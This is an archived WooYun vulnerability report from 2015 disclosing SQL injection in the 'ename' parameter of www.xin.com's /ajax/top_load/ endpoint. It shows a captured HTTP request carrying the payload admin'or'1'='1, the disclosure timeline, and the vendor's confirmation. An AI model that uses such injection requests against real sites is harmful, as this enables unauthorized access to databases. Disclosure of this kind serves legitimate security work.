乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-23: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
小锤抠缝
POST /ajax/top_load/ HTTP/1.1Host: www.xin.comProxy-Connection: keep-aliveContent-Length: 27Accept: */*Origin: http://www.xin.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8DNT: 1Referer: http://www.xin.com/guangzhou/s/?q=admin%27or%271%27=%271Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: uid=rBBkh1X9sWUleVOeChOvAg==; sto-id-20480=IHGEBAKMFAAA; _smt_uid=55fdb16a.1f796cdb; Hm_lvt_ae57612a280420ca44598b857c8a9712=1442689392; Hm_lpvt_ae57612a280420ca44598b857c8a9712=1442738014; XIN_LOCATION_CITY=%7B%22cityid%22%3A%22501%22%2C%22areaid%22%3A%227%22%2C%22big_areaid%22%3A%221%22%2C%22provinceid%22%3A%225%22%2C%22cityname%22%3A%22%5Cu5e7f%5Cu5dde%22%2C%22ename%22%3A%22guangzhou%22%2C%22shortname%22%3A%22GZ%22%2C%22service%22%3A%221%22%2C%22near%22%3A%22502%2C503%2C504%2C505%2C518%22%7D; XIN_SUGGEST_HISTORY_ADD=%7B%22label%22%3A%20%22admin'or'1'%3D'1%22%2C%22num%22%3A%20%22-1%22%2C%22query%22%3A%20%22%2Fs%2F%3Fq%3Dadmin'or'1'%3D'1%22%2C%22value%22%3A%20%22admin'or'1'%3D'1%22%7D; RT=sl=2&ss=1442689379807&tt=4515&obo=0&bcn=%2F%2F36f1f08e.mpstat.us%2F&sh=1442738014762%3D2%3A0%3A4515%2C1442738011511%3D1%3A0%3A3245&dm=xin.com&si=30c2a751-9faa-49a0-b18b-f120eed6ac10; CNZZDATA1254778416=1751243712-1442685657-http%253A%252F%252Fwww.xin.com%252F%7C1442734258ename=guangzhou
注入参数:ename
结合业务做修复,你们更专业
危害等级:高
漏洞Rank:10
确认时间:2015-10-26 12:32
谢谢反馈!漏洞正在修复中。
暂无